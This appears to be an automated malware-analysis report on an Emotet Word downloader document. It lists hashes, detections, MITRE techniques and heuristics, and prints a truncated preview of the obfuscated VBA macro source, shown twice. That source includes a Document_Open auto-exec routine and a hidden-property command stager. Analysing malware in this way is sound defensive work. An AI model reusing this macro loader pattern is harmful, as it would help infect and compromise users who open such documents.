Emotet Office (OLE) malware analysis — malicious · b258e369853bc9ae

MALICIOUS

Office (OLE)

199.6 KB Created: 2019-12-18 16:52:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: bfc9f1544d17fd933c171699d2c264f1 SHA-1: 375b9d6474094c5bf8e0de1806d696292d1917f5 SHA-256: b258e369853bc9aebf589f796d2d9e72d7fac3aacff279e63abc2b7612ce0f37

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate or Obfuscate Malicious Files or Information

The file contains VBA macros, including a Document_Open macro and a hidden-property command stager, which are indicative of malicious activity. ClamAV detection confirms this, identifying it as 'Doc.Downloader.Emotet-7465436-0'. The presence of these elements suggests the macro is designed to download and execute a secondary payload, a common Emotet tactic.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7465436-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7465436-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11220 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11220 bytes
SHA-256: `521c3d047affde71f33d14bbbda400097c9b01d294dc99da61d3b9a49f746802`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Snvuzfuewcoq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Thrboxjee, 0, 0, MSForms, TextBox" Private Sub Document_open() Xgxaojmphtqbe = Wklsmpnrrxios Fljxqriokyd = 465 Pooisrpqfxajj = ("Est cumque ex cupiditate inventore nihil dolorem sint quo.") Dfuukqnfs = (978) Dim Fnvatjpqbdjz As String Dim Oaaoiohc As Double Dim Feipgcjvbb As Boolean Dim Uedrutnc As Integer Dim Ytvpmrksj As Double Dim Kvpaajztox As Integer Dim Mgwkquopasz As Boolean Trprljrirkj = (606) Dim Tjnjehdejjqh As String Vnkrvjlgrkcdo = ("Fugit rem voluptas est.") Vwmwzaecq = (651) Dim Blkhykrlvvhs As String Gnrdgbta = Ndkuxqlteei Klrmchlndzssm = Jlxbnwuuawofk Jvgrhrpprsl = "Voluptatem sapiente laboriosam." Erbkdmjsgg = 667 Pmapfuogdb = Xlmzsbxfsgp Puzlgvjqhoag = 304 Idksozaidqs = ("Consequatur unde.") Glrixbuqzpvxf = (108) Dim Pxmtklobhoazu As Double Dim Jskydfqfcen As Integer Dim Npvihesfez As Boolean Dim Rjjtwbzjig As Boolean Dim Hoqzrjoxmfn As Double Dim Rrqolftynlwg As Double Dim Cnqahmibs As String Nukozmvqbekj = (917) Dim Bjotdusfcljve As Integer Kpzcuxkij = ("Aspernatur est quo nisi.") Apkbsewdfdtip = (484) Dim Irzedhpk As Integer Khzzraffeud = Sfzbadrh Upsjekrkeu = Xwdocockz Qgzegohzgay = "Qui earum." Zraunjyaol = 25 Rxrtudygur = Derhfyvltzg Bskidxzdug = 719 Ciqyidqeoyqzq = ("Betsy") Owqsqjksk = (915) Dim Quimiyzjdpemk As Integer Dim Dvdclrfplge As Boolean Dim Nspfkkmv As Boolean Dim Prahvsjj As Integer Dim Agppicglfxfek As String Dim Kaybziuhsokl As Double Dim Wcxxqbhdzx As Integer Bqywkhclk = (268) Dim Hgogzwbyrw As Double Vigtvohabu = ("Magnam nisi exercitationem.") Divdciyze = (301) Dim Qcvihyyqiah As Boolean Dngxdsinlhc = Yvjxbedt Afabddmhwfha = Awlibfus Achkyczun = "Vel officiis saepe." Rdqfkzagk = 880 Heeqnnxywpgp End Sub Attribute VB_Name = "Rlomapwxvimn" Attribute VB_Base = "0{01CB3C20-E57A-44C8-87FE-2A0A521467A3}{3C70AEA9-3F80-4386-857F-DBEAEFD3917B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Nhnotjbd" Function Tcoienomvuui() Uidqynybualq = Rbuufayfrhicf Hmpoauzabujy = 394 Dlqmmwic = ("Explicabo.") Mwprwhwh = (162) Dim Nowckdrbtz As Integer Dim Adnvrqsz As Boolean Dim Qnceeidty As Integer Dim Ooppobjfhivgk As Integer Dim Dbqfocaixi As String Dim Yixabtelo As Integer Dim Dojubwvhr As Boolean Fcdsnvogsgnv = (16) Dim Jhtmgkyfumqfh As Boolean Bbixgduxjg = ("Itaque id est quo consequatur est et qui.") Hfzptyxsobvlx = (556) Dim Hqbhnquqefxet As Integer Kgwoqzvxxh = Xagxandnh Vfnpukvudderp = Dzmseackx Hwqpbdchajdka = "Quis velit." Ngcsiris = 114 Wldavdmen = Snvuzfuewcoq.Thrboxjee Xemwwnfzykb = Phimqbfdloiy Oyhugybrz = 616 Gmgpawik = ("Deserunt sit assumenda officiis.") Nsqnehmmpeyk = (529) Dim Brqvetxiamkp As String Dim Lszodmafqhb As Boolean Dim Fjdcveoojfn As Double Dim Vfsecpiyaxe As Boolean Dim Vrvajunds As Integer Dim Jokkzcmmioqvn As Double Dim Liqemyso As String Siwssldgvvofy = (501) Dim Ksbtfviofifnn As String Qabmgtqtpcmpr = ("Josefina") Gjrfbgqudck = (337) Dim Knxptyeodltf As Integer Mqsfqxpcvwikr = Ykwzyjbex Mbcxxahgeelw = Chsbhigeifbwf Klujxkoaxyh = "Hic." Vamodcwbjd = 702 Gqpnoqsste = Wldavdmen + Rlomapwxvimn.Mkoazdwzyd + Rlomapwxvimn.Otdrhfqgrid + Rlomapwxvimn.Mibqkorqklj Ortljonsal = Owgujxllvdqs Dwrujhxvcuhh = 793 Dtkgcbrqggwcl = ("Fugiat qui est ea natus sunt.") Kabpqkqbgbs = (253) Dim Ulmcwoictkpu As String Dim Pkyhwwertfr As Double Dim Mreejgyvut As Integer Dim Wrorqlvpx As Double Dim Huwyodrhklc As Boolean Dim Pgfobrvrea As Integer Dim Padtwvola As Integer Nhkscmjvuv = (520) Dim Kggngfzd As String Tyconopoljtws = ("Amet quia.") Ysevfejlytn = (61) Dim Hfb ... (truncated)

SHA-256: 521c3d047affde71f33d14bbbda400097c9b01d294dc99da61d3b9a49f746802

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Snvuzfuewcoq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Thrboxjee, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Xgxaojmphtqbe = Wklsmpnrrxios
Fljxqriokyd = 465
Pooisrpqfxajj = ("Est cumque ex cupiditate inventore nihil dolorem sint quo.")
Dfuukqnfs = (978)
Dim Fnvatjpqbdjz As String
Dim Oaaoiohc As Double
Dim Feipgcjvbb As Boolean
Dim Uedrutnc As Integer
Dim Ytvpmrksj As Double
Dim Kvpaajztox As Integer
Dim Mgwkquopasz As Boolean
Trprljrirkj = (606)
Dim Tjnjehdejjqh As String
Vnkrvjlgrkcdo = ("Fugit rem voluptas est.")
Vwmwzaecq = (651)
Dim Blkhykrlvvhs As String
Gnrdgbta = Ndkuxqlteei
Klrmchlndzssm = Jlxbnwuuawofk
Jvgrhrpprsl = "Voluptatem sapiente laboriosam."
Erbkdmjsgg = 667
   Pmapfuogdb = Xlmzsbxfsgp
Puzlgvjqhoag = 304
Idksozaidqs = ("Consequatur unde.")
Glrixbuqzpvxf = (108)
Dim Pxmtklobhoazu As Double
Dim Jskydfqfcen As Integer
Dim Npvihesfez As Boolean
Dim Rjjtwbzjig As Boolean
Dim Hoqzrjoxmfn As Double
Dim Rrqolftynlwg As Double
Dim Cnqahmibs As String
Nukozmvqbekj = (917)
Dim Bjotdusfcljve As Integer
Kpzcuxkij = ("Aspernatur est quo nisi.")
Apkbsewdfdtip = (484)
Dim Irzedhpk As Integer
Khzzraffeud = Sfzbadrh
Upsjekrkeu = Xwdocockz
Qgzegohzgay = "Qui earum."
Zraunjyaol = 25
   Rxrtudygur = Derhfyvltzg
Bskidxzdug = 719
Ciqyidqeoyqzq = ("Betsy")
Owqsqjksk = (915)
Dim Quimiyzjdpemk As Integer
Dim Dvdclrfplge As Boolean
Dim Nspfkkmv As Boolean
Dim Prahvsjj As Integer
Dim Agppicglfxfek As String
Dim Kaybziuhsokl As Double
Dim Wcxxqbhdzx As Integer
Bqywkhclk = (268)
Dim Hgogzwbyrw As Double
Vigtvohabu = ("Magnam nisi exercitationem.")
Divdciyze = (301)
Dim Qcvihyyqiah As Boolean
Dngxdsinlhc = Yvjxbedt
Afabddmhwfha = Awlibfus
Achkyczun = "Vel officiis saepe."
Rdqfkzagk = 880
Heeqnnxywpgp
End Sub

Attribute VB_Name = "Rlomapwxvimn"
Attribute VB_Base = "0{01CB3C20-E57A-44C8-87FE-2A0A521467A3}{3C70AEA9-3F80-4386-857F-DBEAEFD3917B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Nhnotjbd"
Function Tcoienomvuui()
   Uidqynybualq = Rbuufayfrhicf
Hmpoauzabujy = 394
Dlqmmwic = ("Explicabo.")
Mwprwhwh = (162)
Dim Nowckdrbtz As Integer
Dim Adnvrqsz As Boolean
Dim Qnceeidty As Integer
Dim Ooppobjfhivgk As Integer
Dim Dbqfocaixi As String
Dim Yixabtelo As Integer
Dim Dojubwvhr As Boolean
Fcdsnvogsgnv = (16)
Dim Jhtmgkyfumqfh As Boolean
Bbixgduxjg = ("Itaque id est quo consequatur est et qui.")
Hfzptyxsobvlx = (556)
Dim Hqbhnquqefxet As Integer
Kgwoqzvxxh = Xagxandnh
Vfnpukvudderp = Dzmseackx
Hwqpbdchajdka = "Quis velit."
Ngcsiris = 114
Wldavdmen = Snvuzfuewcoq.Thrboxjee
   Xemwwnfzykb = Phimqbfdloiy
Oyhugybrz = 616
Gmgpawik = ("Deserunt sit assumenda officiis.")
Nsqnehmmpeyk = (529)
Dim Brqvetxiamkp As String
Dim Lszodmafqhb As Boolean
Dim Fjdcveoojfn As Double
Dim Vfsecpiyaxe As Boolean
Dim Vrvajunds As Integer
Dim Jokkzcmmioqvn As Double
Dim Liqemyso As String
Siwssldgvvofy = (501)
Dim Ksbtfviofifnn As String
Qabmgtqtpcmpr = ("Josefina")
Gjrfbgqudck = (337)
Dim Knxptyeodltf As Integer
Mqsfqxpcvwikr = Ykwzyjbex
Mbcxxahgeelw = Chsbhigeifbwf
Klujxkoaxyh = "Hic."
Vamodcwbjd = 702
Gqpnoqsste = Wldavdmen + Rlomapwxvimn.Mkoazdwzyd + Rlomapwxvimn.Otdrhfqgrid + Rlomapwxvimn.Mibqkorqklj
   Ortljonsal = Owgujxllvdqs
Dwrujhxvcuhh = 793
Dtkgcbrqggwcl = ("Fugiat qui est ea natus sunt.")
Kabpqkqbgbs = (253)
Dim Ulmcwoictkpu As String
Dim Pkyhwwertfr As Double
Dim Mreejgyvut As Integer
Dim Wrorqlvpx As Double
Dim Huwyodrhklc As Boolean
Dim Pgfobrvrea As Integer
Dim Padtwvola As Integer
Nhkscmjvuv = (520)
Dim Kggngfzd As String
Tyconopoljtws = ("Amet quia.")
Ysevfejlytn = (61)
Dim Hfb
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.